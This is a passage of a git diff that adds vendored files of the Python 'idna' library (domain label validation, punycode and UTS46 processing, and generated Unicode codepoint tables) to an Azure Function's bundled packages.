ToUnicode(label: Union[bytes, bytearray]) -> str: + return decode(label) + +def nameprep(s: Any) -> None: + raise NotImplementedError('IDNA 2008 does not utilise nameprep protocol') + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/core.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/core.py new file mode 100644 index 0000000..5e8c064 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/core.py @@ -0,0 +1,397 @@ +from . 
import idnadata +import bisect +import unicodedata +import re +from typing import Union, Optional +from .intranges import intranges_contain + +_virama_combining_class = 9 +_alabel_prefix = b'xn--' +_unicode_dots_re = re.compile('[\u002e\u3002\uff0e\uff61]') + +class IDNAError(UnicodeError): + """ Base exception for all IDNA-encoding related problems """ + pass + + +class IDNABidiError(IDNAError): + """ Exception when bidirectional requirements are not satisfied """ + pass + + +class InvalidCodepoint(IDNAError): + """ Exception when a disallowed or unallocated codepoint is used """ + pass + + +class InvalidCodepointContext(IDNAError): + """ Exception when the codepoint is not valid in the context it is used """ + pass + + +def _combining_class(cp: int) -> int: + v = unicodedata.combining(chr(cp)) + if v == 0: + if not unicodedata.name(chr(cp)): + raise ValueError('Unknown character in unicodedata') + return v + +def _is_script(cp: str, script: str) -> bool: + return intranges_contain(ord(cp), idnadata.scripts[script]) + +def _punycode(s: str) -> bytes: + return s.encode('punycode') + +def _unot(s: int) -> str: + return 'U+{:04X}'.format(s) + + +def valid_label_length(label: Union[bytes, str]) -> bool: + if len(label) > 63: + return False + return True + + +def valid_string_length(label: Union[bytes, str], trailing_dot: bool) -> bool: + if len(label) > (254 if trailing_dot else 253): + return False + return True + + +def check_bidi(label: str, check_ltr: bool = False) -> bool: + # Bidi rules should only be applied if string contains RTL characters + bidi_label = False + for (idx, cp) in enumerate(label, 1): + direction = unicodedata.bidirectional(cp) + if direction == '': + # String likely comes from a newer version of Unicode + raise IDNABidiError('Unknown directionality in label {} at position {}'.format(repr(label), idx)) + if direction in ['R', 'AL', 'AN']: + bidi_label = True + if not bidi_label and not check_ltr: + return True + + # Bidi rule 1 + direction = unicodedata.bidirectional(label[0]) + if direction in ['R', 'AL']: + rtl = True + elif direction == 'L': + rtl = False + else: + raise IDNABidiError('First codepoint in label {} must be directionality L, R or AL'.format(repr(label))) + + valid_ending = False + number_type = None # type: Optional[str] + for (idx, cp) in enumerate(label, 1): + direction = unicodedata.bidirectional(cp) + + if rtl: + # Bidi rule 2 + if not direction in ['R', 'AL', 'AN', 'EN', 'ES', 'CS', 'ET', 'ON', 'BN', 'NSM']: + raise IDNABidiError('Invalid direction for codepoint at position {} in a right-to-left label'.format(idx)) + # Bidi rule 3 + if direction in ['R', 'AL', 'EN', 'AN']: + valid_ending = True + elif direction != 'NSM': + valid_ending = False + # Bidi rule 4 + if direction in ['AN', 'EN']: + if not number_type: + number_type = direction + else: + if number_type != direction: + raise IDNABidiError('Can not mix numeral types in a right-to-left label') + else: + # Bidi rule 5 + if not direction in ['L', 'EN', 'ES', 'CS', 'ET', 'ON', 'BN', 'NSM']: + raise IDNABidiError('Invalid direction for codepoint at position {} in a left-to-right label'.format(idx)) + # Bidi rule 6 + if direction in ['L', 'EN']: + valid_ending = True + elif direction != 'NSM': + valid_ending = False + + if not valid_ending: + raise IDNABidiError('Label ends with illegal codepoint directionality') + + return True + + +def check_initial_combiner(label: str) -> bool: + if unicodedata.category(label[0])[0] == 'M': + raise IDNAError('Label begins with an illegal combining character') 
+ return True + + +def check_hyphen_ok(label: str) -> bool: + if label[2:4] == '--': + raise IDNAError('Label has disallowed hyphens in 3rd and 4th position') + if label[0] == '-' or label[-1] == '-': + raise IDNAError('Label must not start or end with a hyphen') + return True + + +def check_nfc(label: str) -> None: + if unicodedata.normalize('NFC', label) != label: + raise IDNAError('Label must be in Normalization Form C') + + +def valid_contextj(label: str, pos: int) -> bool: + cp_value = ord(label[pos]) + + if cp_value == 0x200c: + + if pos > 0: + if _combining_class(ord(label[pos - 1])) == _virama_combining_class: + return True + + ok = False + for i in range(pos-1, -1, -1): + joining_type = idnadata.joining_types.get(ord(label[i])) + if joining_type == ord('T'): + continue + if joining_type in [ord('L'), ord('D')]: + ok = True + break + + if not ok: + return False + + ok = False + for i in range(pos+1, len(label)): + joining_type = idnadata.joining_types.get(ord(label[i])) + if joining_type == ord('T'): + continue + if joining_type in [ord('R'), ord('D')]: + ok = True + break + return ok + + if cp_value == 0x200d: + + if pos > 0: + if _combining_class(ord(label[pos - 1])) == _virama_combining_class: + return True + return False + + else: + + return False + + +def valid_contexto(label: str, pos: int, exception: bool = False) -> bool: + cp_value = ord(label[pos]) + + if cp_value == 0x00b7: + if 0 < pos < len(label)-1: + if ord(label[pos - 1]) == 0x006c and ord(label[pos + 1]) == 0x006c: + return True + return False + + elif cp_value == 0x0375: + if pos < len(label)-1 and len(label) > 1: + return _is_script(label[pos + 1], 'Greek') + return False + + elif cp_value == 0x05f3 or cp_value == 0x05f4: + if pos > 0: + return _is_script(label[pos - 1], 'Hebrew') + return False + + elif cp_value == 0x30fb: + for cp in label: + if cp == '\u30fb': + continue + if _is_script(cp, 'Hiragana') or _is_script(cp, 'Katakana') or _is_script(cp, 'Han'): + return True + return False + + elif 0x660 <= cp_value <= 0x669: + for cp in label: + if 0x6f0 <= ord(cp) <= 0x06f9: + return False + return True + + elif 0x6f0 <= cp_value <= 0x6f9: + for cp in label: + if 0x660 <= ord(cp) <= 0x0669: + return False + return True + + return False + + +def check_label(label: Union[str, bytes, bytearray]) -> None: + if isinstance(label, (bytes, bytearray)): + label = label.decode('utf-8') + if len(label) == 0: + raise IDNAError('Empty Label') + + check_nfc(label) + check_hyphen_ok(label) + check_initial_combiner(label) + + for (pos, cp) in enumerate(label): + cp_value = ord(cp) + if intranges_contain(cp_value, idnadata.codepoint_classes['PVALID']): + continue + elif intranges_contain(cp_value, idnadata.codepoint_classes['CONTEXTJ']): + try: + if not valid_contextj(label, pos): + raise InvalidCodepointContext('Joiner {} not allowed at position {} in {}'.format( + _unot(cp_value), pos+1, repr(label))) + except ValueError: + raise IDNAError('Unknown codepoint adjacent to joiner {} at position {} in {}'.format( + _unot(cp_value), pos+1, repr(label))) + elif intranges_contain(cp_value, idnadata.codepoint_classes['CONTEXTO']): + if not valid_contexto(label, pos): + raise InvalidCodepointContext('Codepoint {} not allowed at position {} in {}'.format(_unot(cp_value), pos+1, repr(label))) + else: + raise InvalidCodepoint('Codepoint {} at position {} of {} not allowed'.format(_unot(cp_value), pos+1, repr(label))) + + check_bidi(label) + + +def alabel(label: str) -> bytes: + try: + label_bytes = label.encode('ascii') + 
ulabel(label_bytes) + if not valid_label_length(label_bytes): + raise IDNAError('Label too long') + return label_bytes + except UnicodeEncodeError: + pass + + if not label: + raise IDNAError('No Input') + + label = str(label) + check_label(label) + label_bytes = _punycode(label) + label_bytes = _alabel_prefix + label_bytes + + if not valid_label_length(label_bytes): + raise IDNAError('Label too long') + + return label_bytes + + +def ulabel(label: Union[str, bytes, bytearray]) -> str: + if not isinstance(label, (bytes, bytearray)): + try: + label_bytes = label.encode('ascii') + except UnicodeEncodeError: + check_label(label) + return label + else: + label_bytes = label + + label_bytes = label_bytes.lower() + if label_bytes.startswith(_alabel_prefix): + label_bytes = label_bytes[len(_alabel_prefix):] + if not label_bytes: + raise IDNAError('Malformed A-label, no Punycode eligible content found') + if label_bytes.decode('ascii')[-1] == '-': + raise IDNAError('A-label must not end with a hyphen') + else: + check_label(label_bytes) + return label_bytes.decode('ascii') + + try: + label = label_bytes.decode('punycode') + except UnicodeError: + raise IDNAError('Invalid A-label') + check_label(label) + return label + + +def uts46_remap(domain: str, std3_rules: bool = True, transitional: bool = False) -> str: + """Re-map the characters in the string according to UTS46 processing.""" + from .uts46data import uts46data + output = '' + + for pos, char in enumerate(domain): + code_point = ord(char) + try: + uts46row = uts46data[code_point if code_point < 256 else + bisect.bisect_left(uts46data, (code_point, 'Z')) - 1] + status = uts46row[1] + replacement = None # type: Optional[str] + if len(uts46row) == 3: + replacement = uts46row[2] # type: ignore + if (status == 'V' or + (status == 'D' and not transitional) or + (status == '3' and not std3_rules and replacement is None)): + output += char + elif replacement is not None and (status == 'M' or + (status == '3' and not std3_rules) or + (status == 'D' and transitional)): + output += replacement + elif status != 'I': + raise IndexError() + except IndexError: + raise InvalidCodepoint( + 'Codepoint {} not allowed at position {} in {}'.format( + _unot(code_point), pos + 1, repr(domain))) + + return unicodedata.normalize('NFC', output) + + +def encode(s: Union[str, bytes, bytearray], strict: bool = False, uts46: bool = False, std3_rules: bool = False, transitional: bool = False) -> bytes: + if isinstance(s, (bytes, bytearray)): + s = s.decode('ascii') + if uts46: + s = uts46_remap(s, std3_rules, transitional) + trailing_dot = False + result = [] + if strict: + labels = s.split('.') + else: + labels = _unicode_dots_re.split(s) + if not labels or labels == ['']: + raise IDNAError('Empty domain') + if labels[-1] == '': + del labels[-1] + trailing_dot = True + for label in labels: + s = alabel(label) + if s: + result.append(s) + else: + raise IDNAError('Empty label') + if trailing_dot: + result.append(b'') + s = b'.'.join(result) + if not valid_string_length(s, trailing_dot): + raise IDNAError('Domain too long') + return s + + +def decode(s: Union[str, bytes, bytearray], strict: bool = False, uts46: bool = False, std3_rules: bool = False) -> str: + try: + if isinstance(s, (bytes, bytearray)): + s = s.decode('ascii') + except UnicodeDecodeError: + raise IDNAError('Invalid ASCII in A-label') + if uts46: + s = uts46_remap(s, std3_rules, False) + trailing_dot = False + result = [] + if not strict: + labels = _unicode_dots_re.split(s) + else: + labels = s.split('.') + 
if not labels or labels == ['']: + raise IDNAError('Empty domain') + if not labels[-1]: + del labels[-1] + trailing_dot = True + for label in labels: + s = ulabel(label) + if s: + result.append(s) + else: + raise IDNAError('Empty label') + if trailing_dot: + result.append('') + return '.'.join(result) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/idnadata.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/idnadata.py new file mode 100644 index 0000000..21da0de --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/idnadata.py @@ -0,0 +1,2137 @@ +# This file is automatically generated by tools/idna-data + +__version__ = '14.0.0' +scripts = { + 'Greek': ( + 0x37000000374, + 0x37500000378, + 0x37a0000037e, + 0x37f00000380, + 0x38400000385, + 0x38600000387, + 0x3880000038b, + 0x38c0000038d, + 0x38e000003a2, + 0x3a3000003e2, + 0x3f000000400, + 0x1d2600001d2b, + 0x1d5d00001d62, + 0x1d6600001d6b, + 0x1dbf00001dc0, + 0x1f0000001f16, + 0x1f1800001f1e, + 0x1f2000001f46, + 0x1f4800001f4e, + 0x1f5000001f58, + 0x1f5900001f5a, + 0x1f5b00001f5c, + 0x1f5d00001f5e, + 0x1f5f00001f7e, + 0x1f8000001fb5, + 0x1fb600001fc5, + 0x1fc600001fd4, + 0x1fd600001fdc, + 0x1fdd00001ff0, + 0x1ff200001ff5, + 0x1ff600001fff, + 0x212600002127, + 0xab650000ab66, + 0x101400001018f, + 0x101a0000101a1, + 0x1d2000001d246, + ), + 'Han': ( + 0x2e8000002e9a, + 0x2e9b00002ef4, + 0x2f0000002fd6, + 0x300500003006, + 0x300700003008, + 0x30210000302a, + 0x30380000303c, + 0x340000004dc0, + 0x4e000000a000, + 0xf9000000fa6e, + 0xfa700000fada, + 0x16fe200016fe4, + 0x16ff000016ff2, + 0x200000002a6e0, + 0x2a7000002b739, + 0x2b7400002b81e, + 0x2b8200002cea2, + 0x2ceb00002ebe1, + 0x2f8000002fa1e, + 0x300000003134b, + ), + 'Hebrew': ( + 0x591000005c8, + 0x5d0000005eb, + 0x5ef000005f5, + 0xfb1d0000fb37, + 0xfb380000fb3d, + 0xfb3e0000fb3f, + 0xfb400000fb42, + 0xfb430000fb45, + 0xfb460000fb50, + ), + 'Hiragana': ( + 0x304100003097, + 0x309d000030a0, + 0x1b0010001b120, + 0x1b1500001b153, + 0x1f2000001f201, + ), + 'Katakana': ( + 0x30a1000030fb, + 0x30fd00003100, + 0x31f000003200, + 0x32d0000032ff, + 0x330000003358, + 0xff660000ff70, + 0xff710000ff9e, + 0x1aff00001aff4, + 0x1aff50001affc, + 0x1affd0001afff, + 0x1b0000001b001, + 0x1b1200001b123, + 0x1b1640001b168, + ), +} +joining_types = { + 0x600: 85, + 0x601: 85, + 0x602: 85, + 0x603: 85, + 0x604: 85, + 0x605: 85, + 0x608: 85, + 0x60b: 85, + 0x620: 68, + 0x621: 85, + 0x622: 82, + 0x623: 82, + 0x624: 82, + 0x625: 82, + 0x626: 68, + 0x627: 82, + 0x628: 68, + 0x629: 82, + 0x62a: 68, + 0x62b: 68, + 0x62c: 68, + 0x62d: 68, + 0x62e: 68, + 0x62f: 82, + 0x630: 82, + 0x631: 82, + 0x632: 82, + 0x633: 68, + 0x634: 68, + 0x635: 68, + 0x636: 68, + 0x637: 68, + 0x638: 68, + 0x639: 68, + 0x63a: 68, + 0x63b: 68, + 0x63c: 68, + 0x63d: 68, + 0x63e: 68, + 0x63f: 68, + 0x640: 67, + 0x641: 68, + 0x642: 68, + 0x643: 68, + 0x644: 68, + 0x645: 68, + 0x646: 68, + 0x647: 68, + 0x648: 82, + 0x649: 68, + 0x64a: 68, + 0x66e: 68, + 0x66f: 68, + 0x671: 82, + 0x672: 82, + 0x673: 82, + 0x674: 85, + 0x675: 82, + 0x676: 82, + 0x677: 82, + 0x678: 68, + 0x679: 68, + 0x67a: 68, + 0x67b: 68, + 0x67c: 68, + 0x67d: 68, + 0x67e: 68, + 0x67f: 68, + 0x680: 68, + 0x681: 68, + 0x682: 68, + 0x683: 68, + 0x684: 68, + 0x685: 68, + 0x686: 68, + 0x687: 68, + 0x688: 82, + 0x689: 82, + 0x68a: 82, + 0x68b: 82, + 0x68c: 82, + 0x68d: 82, + 0x68e: 82, + 0x68f: 82, + 0x690: 82, + 0x691: 82, + 0x692: 82, + 0x693: 
82, + 0x694: 82, + 0x695: 82, + 0x696: 82, + 0x697: 82, + 0x698: 82, + 0x699: 82, + 0x69a: 68, + 0x69b: 68, + 0x69c: 68, + 0x69d: 68, + 0x69e: 68, + 0x69f: 68, + 0x6a0: 68, + 0x6a1: 68, + 0x6a2: 68, + 0x6a3: 68, + 0x6a4: 68, + 0x6a5: 68, + 0x6a6: 68, + 0x6a7: 68, + 0x6a8: 68, + 0x6a9: 68, + 0x6aa: 68, + 0x6ab: 68, + 0x6ac: 68, + 0x6ad: 68, + 0x6ae: 68, + 0x6af: 68, + 0x6b0: 68, + 0x6b1: 68, + 0x6b2: 68, + 0x6b3: 68, + 0x6b4: 68, + 0x6b5: 68, + 0x6b6: 68, + 0x6b7: 68, + 0x6b8: 68, + 0x6b9: 68, + 0x6ba: 68, + 0x6bb: 68, + 0x6bc: 68, + 0x6bd: 68, + 0x6be: 68, + 0x6bf: 68, + 0x6c0: 82, + 0x6c1: 68, + 0x6c2: 68, + 0x6c3: 82, + 0x6c4: 82, + 0x6c5: 82, + 0x6c6: 82, + 0x6c7: 82, + 0x6c8: 82, + 0x6c9: 82, + 0x6ca: 82, + 0x6cb: 82, + 0x6cc: 68, + 0x6cd: 82, + 0x6ce: 68, + 0x6cf: 82, + 0x6d0: 68, + 0x6d1: 68, + 0x6d2: 82, + 0x6d3: 82, + 0x6d5: 82, + 0x6dd: 85, + 0x6ee: 82, + 0x6ef: 82, + 0x6fa: 68, + 0x6fb: 68, + 0x6fc: 68, + 0x6ff: 68, + 0x70f: 84, + 0x710: 82, + 0x712: 68, + 0x713: 68, + 0x714: 68, + 0x715: 82, + 0x716: 82, + 0x717: 82, + 0x718: 82, + 0x719: 82, + 0x71a: 68, + 0x71b: 68, + 0x71c: 68, + 0x71d: 68, + 0x71e: 82, + 0x71f: 68, + 0x720: 68, + 0x721: 68, + 0x722: 68, + 0x723: 68, + 0x724: 68, + 0x725: 68, + 0x726: 68, + 0x727: 68, + 0x728: 82, + 0x729: 68, + 0x72a: 82, + 0x72b: 68, + 0x72c: 82, + 0x72d: 68, + 0x72e: 68, + 0x72f: 82, + 0x74d: 82, + 0x74e: 68, + 0x74f: 68, + 0x750: 68, + 0x751: 68, + 0x752: 68, + 0x753: 68, + 0x754: 68, + 0x755: 68, + 0x756: 68, + 0x757: 68, + 0x758: 68, + 0x759: 82, + 0x75a: 82, + 0x75b: 82, + 0x75c: 68, + 0x75d: 68, + 0x75e: 68, + 0x75f: 68, + 0x760: 68, + 0x761: 68, + 0x762: 68, + 0x763: 68, + 0x764: 68, + 0x765: 68, + 0x766: 68, + 0x767: 68, + 0x768: 68, + 0x769: 68, + 0x76a: 68, + 0x76b: 82, + 0x76c: 82, + 0x76d: 68, + 0x76e: 68, + 0x76f: 68, + 0x770: 68, + 0x771: 82, + 0x772: 68, + 0x773: 82, + 0x774: 82, + 0x775: 68, + 0x776: 68, + 0x777: 68, + 0x778: 82, + 0x779: 82, + 0x77a: 68, + 0x77b: 68, + 0x77c: 68, + 0x77d: 68, + 0x77e: 68, + 0x77f: 68, + 0x7ca: 68, + 0x7cb: 68, + 0x7cc: 68, + 0x7cd: 68, + 0x7ce: 68, + 0x7cf: 68, + 0x7d0: 68, + 0x7d1: 68, + 0x7d2: 68, + 0x7d3: 68, + 0x7d4: 68, + 0x7d5: 68, + 0x7d6: 68, + 0x7d7: 68, + 0x7d8: 68, + 0x7d9: 68, + 0x7da: 68, + 0x7db: 68, + 0x7dc: 68, + 0x7dd: 68, + 0x7de: 68, + 0x7df: 68, + 0x7e0: 68, + 0x7e1: 68, + 0x7e2: 68, + 0x7e3: 68, + 0x7e4: 68, + 0x7e5: 68, + 0x7e6: 68, + 0x7e7: 68, + 0x7e8: 68, + 0x7e9: 68, + 0x7ea: 68, + 0x7fa: 67, + 0x840: 82, + 0x841: 68, + 0x842: 68, + 0x843: 68, + 0x844: 68, + 0x845: 68, + 0x846: 82, + 0x847: 82, + 0x848: 68, + 0x849: 82, + 0x84a: 68, + 0x84b: 68, + 0x84c: 68, + 0x84d: 68, + 0x84e: 68, + 0x84f: 68, + 0x850: 68, + 0x851: 68, + 0x852: 68, + 0x853: 68, + 0x854: 82, + 0x855: 68, + 0x856: 82, + 0x857: 82, + 0x858: 82, + 0x860: 68, + 0x861: 85, + 0x862: 68, + 0x863: 68, + 0x864: 68, + 0x865: 68, + 0x866: 85, + 0x867: 82, + 0x868: 68, + 0x869: 82, + 0x86a: 82, + 0x870: 82, + 0x871: 82, + 0x872: 82, + 0x873: 82, + 0x874: 82, + 0x875: 82, + 0x876: 82, + 0x877: 82, + 0x878: 82, + 0x879: 82, + 0x87a: 82, + 0x87b: 82, + 0x87c: 82, + 0x87d: 82, + 0x87e: 82, + 0x87f: 82, + 0x880: 82, + 0x881: 82, + 0x882: 82, + 0x883: 67, + 0x884: 67, + 0x885: 67, + 0x886: 68, + 0x887: 85, + 0x888: 85, + 0x889: 68, + 0x88a: 68, + 0x88b: 68, + 0x88c: 68, + 0x88d: 68, + 0x88e: 82, + 0x890: 85, + 0x891: 85, + 0x8a0: 68, + 0x8a1: 68, + 0x8a2: 68, + 0x8a3: 68, + 0x8a4: 68, + 0x8a5: 68, + 0x8a6: 68, + 0x8a7: 68, + 0x8a8: 68, + 0x8a9: 68, + 0x8aa: 82, + 0x8ab: 82, + 0x8ac: 82, + 0x8ad: 85, + 0x8ae: 82, + 
0x8af: 68, + 0x8b0: 68, + 0x8b1: 82, + 0x8b2: 82, + 0x8b3: 68, + 0x8b4: 68, + 0x8b5: 68, + 0x8b6: 68, + 0x8b7: 68, + 0x8b8: 68, + 0x8b9: 82, + 0x8ba: 68, + 0x8bb: 68, + 0x8bc: 68, + 0x8bd: 68, + 0x8be: 68, + 0x8bf: 68, + 0x8c0: 68, + 0x8c1: 68, + 0x8c2: 68, + 0x8c3: 68, + 0x8c4: 68, + 0x8c5: 68, + 0x8c6: 68, + 0x8c7: 68, + 0x8c8: 68, + 0x8e2: 85, + 0x1806: 85, + 0x1807: 68, + 0x180a: 67, + 0x180e: 85, + 0x1820: 68, + 0x1821: 68, + 0x1822: 68, + 0x1823: 68, + 0x1824: 68, + 0x1825: 68, + 0x1826: 68, + 0x1827: 68, + 0x1828: 68, + 0x1829: 68, + 0x182a: 68, + 0x182b: 68, + 0x182c: 68, + 0x182d: 68, + 0x182e: 68, + 0x182f: 68, + 0x1830: 68, + 0x1831: 68, + 0x1832: 68, + 0x1833: 68, + 0x1834: 68, + 0x1835: 68, + 0x1836: 68, + 0x1837: 68, + 0x1838: 68, + 0x1839: 68, + 0x183a: 68, + 0x183b: 68, + 0x183c: 68, + 0x183d: 68, + 0x183e: 68, + 0x183f: 68, + 0x1840: 68, + 0x1841: 68, + 0x1842: 68, + 0x1843: 68, + 0x1844: 68, + 0x1845: 68, + 0x1846: 68, + 0x1847: 68, + 0x1848: 68, + 0x1849: 68, + 0x184a: 68, + 0x184b: 68, + 0x184c: 68, + 0x184d: 68, + 0x184e: 68, + 0x184f: 68, + 0x1850: 68, + 0x1851: 68, + 0x1852: 68, + 0x1853: 68, + 0x1854: 68, + 0x1855: 68, + 0x1856: 68, + 0x1857: 68, + 0x1858: 68, + 0x1859: 68, + 0x185a: 68, + 0x185b: 68, + 0x185c: 68, + 0x185d: 68, + 0x185e: 68, + 0x185f: 68, + 0x1860: 68, + 0x1861: 68, + 0x1862: 68, + 0x1863: 68, + 0x1864: 68, + 0x1865: 68, + 0x1866: 68, + 0x1867: 68, + 0x1868: 68, + 0x1869: 68, + 0x186a: 68, + 0x186b: 68, + 0x186c: 68, + 0x186d: 68, + 0x186e: 68, + 0x186f: 68, + 0x1870: 68, + 0x1871: 68, + 0x1872: 68, + 0x1873: 68, + 0x1874: 68, + 0x1875: 68, + 0x1876: 68, + 0x1877: 68, + 0x1878: 68, + 0x1880: 85, + 0x1881: 85, + 0x1882: 85, + 0x1883: 85, + 0x1884: 85, + 0x1885: 84, + 0x1886: 84, + 0x1887: 68, + 0x1888: 68, + 0x1889: 68, + 0x188a: 68, + 0x188b: 68, + 0x188c: 68, + 0x188d: 68, + 0x188e: 68, + 0x188f: 68, + 0x1890: 68, + 0x1891: 68, + 0x1892: 68, + 0x1893: 68, + 0x1894: 68, + 0x1895: 68, + 0x1896: 68, + 0x1897: 68, + 0x1898: 68, + 0x1899: 68, + 0x189a: 68, + 0x189b: 68, + 0x189c: 68, + 0x189d: 68, + 0x189e: 68, + 0x189f: 68, + 0x18a0: 68, + 0x18a1: 68, + 0x18a2: 68, + 0x18a3: 68, + 0x18a4: 68, + 0x18a5: 68, + 0x18a6: 68, + 0x18a7: 68, + 0x18a8: 68, + 0x18aa: 68, + 0x200c: 85, + 0x200d: 67, + 0x202f: 85, + 0x2066: 85, + 0x2067: 85, + 0x2068: 85, + 0x2069: 85, + 0xa840: 68, + 0xa841: 68, + 0xa842: 68, + 0xa843: 68, + 0xa844: 68, + 0xa845: 68, + 0xa846: 68, + 0xa847: 68, + 0xa848: 68, + 0xa849: 68, + 0xa84a: 68, + 0xa84b: 68, + 0xa84c: 68, + 0xa84d: 68, + 0xa84e: 68, + 0xa84f: 68, + 0xa850: 68, + 0xa851: 68, + 0xa852: 68, + 0xa853: 68, + 0xa854: 68, + 0xa855: 68, + 0xa856: 68, + 0xa857: 68, + 0xa858: 68, + 0xa859: 68, + 0xa85a: 68, + 0xa85b: 68, + 0xa85c: 68, + 0xa85d: 68, + 0xa85e: 68, + 0xa85f: 68, + 0xa860: 68, + 0xa861: 68, + 0xa862: 68, + 0xa863: 68, + 0xa864: 68, + 0xa865: 68, + 0xa866: 68, + 0xa867: 68, + 0xa868: 68, + 0xa869: 68, + 0xa86a: 68, + 0xa86b: 68, + 0xa86c: 68, + 0xa86d: 68, + 0xa86e: 68, + 0xa86f: 68, + 0xa870: 68, + 0xa871: 68, + 0xa872: 76, + 0xa873: 85, + 0x10ac0: 68, + 0x10ac1: 68, + 0x10ac2: 68, + 0x10ac3: 68, + 0x10ac4: 68, + 0x10ac5: 82, + 0x10ac6: 85, + 0x10ac7: 82, + 0x10ac8: 85, + 0x10ac9: 82, + 0x10aca: 82, + 0x10acb: 85, + 0x10acc: 85, + 0x10acd: 76, + 0x10ace: 82, + 0x10acf: 82, + 0x10ad0: 82, + 0x10ad1: 82, + 0x10ad2: 82, + 0x10ad3: 68, + 0x10ad4: 68, + 0x10ad5: 68, + 0x10ad6: 68, + 0x10ad7: 76, + 0x10ad8: 68, + 0x10ad9: 68, + 0x10ada: 68, + 0x10adb: 68, + 0x10adc: 68, + 0x10add: 82, + 0x10ade: 68, + 0x10adf: 68, + 
0x10ae0: 68, + 0x10ae1: 82, + 0x10ae2: 85, + 0x10ae3: 85, + 0x10ae4: 82, + 0x10aeb: 68, + 0x10aec: 68, + 0x10aed: 68, + 0x10aee: 68, + 0x10aef: 82, + 0x10b80: 68, + 0x10b81: 82, + 0x10b82: 68, + 0x10b83: 82, + 0x10b84: 82, + 0x10b85: 82, + 0x10b86: 68, + 0x10b87: 68, + 0x10b88: 68, + 0x10b89: 82, + 0x10b8a: 68, + 0x10b8b: 68, + 0x10b8c: 82, + 0x10b8d: 68, + 0x10b8e: 82, + 0x10b8f: 82, + 0x10b90: 68, + 0x10b91: 82, + 0x10ba9: 82, + 0x10baa: 82, + 0x10bab: 82, + 0x10bac: 82, + 0x10bad: 68, + 0x10bae: 68, + 0x10baf: 85, + 0x10d00: 76, + 0x10d01: 68, + 0x10d02: 68, + 0x10d03: 68, + 0x10d04: 68, + 0x10d05: 68, + 0x10d06: 68, + 0x10d07: 68, + 0x10d08: 68, + 0x10d09: 68, + 0x10d0a: 68, + 0x10d0b: 68, + 0x10d0c: 68, + 0x10d0d: 68, + 0x10d0e: 68, + 0x10d0f: 68, + 0x10d10: 68, + 0x10d11: 68, + 0x10d12: 68, + 0x10d13: 68, + 0x10d14: 68, + 0x10d15: 68, + 0x10d16: 68, + 0x10d17: 68, + 0x10d18: 68, + 0x10d19: 68, + 0x10d1a: 68, + 0x10d1b: 68, + 0x10d1c: 68, + 0x10d1d: 68, + 0x10d1e: 68, + 0x10d1f: 68, + 0x10d20: 68, + 0x10d21: 68, + 0x10d22: 82, + 0x10d23: 68, + 0x10f30: 68, + 0x10f31: 68, + 0x10f32: 68, + 0x10f33: 82, + 0x10f34: 68, + 0x10f35: 68, + 0x10f36: 68, + 0x10f37: 68, + 0x10f38: 68, + 0x10f39: 68, + 0x10f3a: 68, + 0x10f3b: 68, + 0x10f3c: 68, + 0x10f3d: 68, + 0x10f3e: 68, + 0x10f3f: 68, + 0x10f40: 68, + 0x10f41: 68, + 0x10f42: 68, + 0x10f43: 68, + 0x10f44: 68, + 0x10f45: 85, + 0x10f51: 68, + 0x10f52: 68, + 0x10f53: 68, + 0x10f54: 82, + 0x10f70: 68, + 0x10f71: 68, + 0x10f72: 68, + 0x10f73: 68, + 0x10f74: 82, + 0x10f75: 82, + 0x10f76: 68, + 0x10f77: 68, + 0x10f78: 68, + 0x10f79: 68, + 0x10f7a: 68, + 0x10f7b: 68, + 0x10f7c: 68, + 0x10f7d: 68, + 0x10f7e: 68, + 0x10f7f: 68, + 0x10f80: 68, + 0x10f81: 68, + 0x10fb0: 68, + 0x10fb1: 85, + 0x10fb2: 68, + 0x10fb3: 68, + 0x10fb4: 82, + 0x10fb5: 82, + 0x10fb6: 82, + 0x10fb7: 85, + 0x10fb8: 68, + 0x10fb9: 82, + 0x10fba: 82, + 0x10fbb: 68, + 0x10fbc: 68, + 0x10fbd: 82, + 0x10fbe: 68, + 0x10fbf: 68, + 0x10fc0: 85, + 0x10fc1: 68, + 0x10fc2: 82, + 0x10fc3: 82, + 0x10fc4: 68, + 0x10fc5: 85, + 0x10fc6: 85, + 0x10fc7: 85, + 0x10fc8: 85, + 0x10fc9: 82, + 0x10fca: 68, + 0x10fcb: 76, + 0x110bd: 85, + 0x110cd: 85, + 0x1e900: 68, + 0x1e901: 68, + 0x1e902: 68, + 0x1e903: 68, + 0x1e904: 68, + 0x1e905: 68, + 0x1e906: 68, + 0x1e907: 68, + 0x1e908: 68, + 0x1e909: 68, + 0x1e90a: 68, + 0x1e90b: 68, + 0x1e90c: 68, + 0x1e90d: 68, + 0x1e90e: 68, + 0x1e90f: 68, + 0x1e910: 68, + 0x1e911: 68, + 0x1e912: 68, + 0x1e913: 68, + 0x1e914: 68, + 0x1e915: 68, + 0x1e916: 68, + 0x1e917: 68, + 0x1e918: 68, + 0x1e919: 68, + 0x1e91a: 68, + 0x1e91b: 68, + 0x1e91c: 68, + 0x1e91d: 68, + 0x1e91e: 68, + 0x1e91f: 68, + 0x1e920: 68, + 0x1e921: 68, + 0x1e922: 68, + 0x1e923: 68, + 0x1e924: 68, + 0x1e925: 68, + 0x1e926: 68, + 0x1e927: 68, + 0x1e928: 68, + 0x1e929: 68, + 0x1e92a: 68, + 0x1e92b: 68, + 0x1e92c: 68, + 0x1e92d: 68, + 0x1e92e: 68, + 0x1e92f: 68, + 0x1e930: 68, + 0x1e931: 68, + 0x1e932: 68, + 0x1e933: 68, + 0x1e934: 68, + 0x1e935: 68, + 0x1e936: 68, + 0x1e937: 68, + 0x1e938: 68, + 0x1e939: 68, + 0x1e93a: 68, + 0x1e93b: 68, + 0x1e93c: 68, + 0x1e93d: 68, + 0x1e93e: 68, + 0x1e93f: 68, + 0x1e940: 68, + 0x1e941: 68, + 0x1e942: 68, + 0x1e943: 68, + 0x1e94b: 84, +} +codepoint_classes = { + 'PVALID': ( + 0x2d0000002e, + 0x300000003a, + 0x610000007b, + 0xdf000000f7, + 0xf800000100, + 0x10100000102, + 0x10300000104, + 0x10500000106, + 0x10700000108, + 0x1090000010a, + 0x10b0000010c, + 0x10d0000010e, + 